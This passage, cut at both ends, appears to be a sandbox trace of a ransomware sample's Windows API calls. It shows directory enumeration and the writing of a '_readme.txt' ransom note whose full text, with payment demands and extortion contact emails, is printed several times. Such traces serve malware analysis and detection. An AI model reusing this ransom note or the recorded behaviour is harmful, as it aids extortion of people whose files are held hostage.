(HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.177] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0175.177] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0175.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.177] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.177] PathFindFileNameW (pszPath="") returned="" [0175.178] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.178] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.178] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.178] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.179] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0175.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.179] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0175.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.180] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.180] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0175.180] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.181] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*" (normalized: "c:\\boot\\ru-ru\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0175.182] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0175.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0175.183] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: 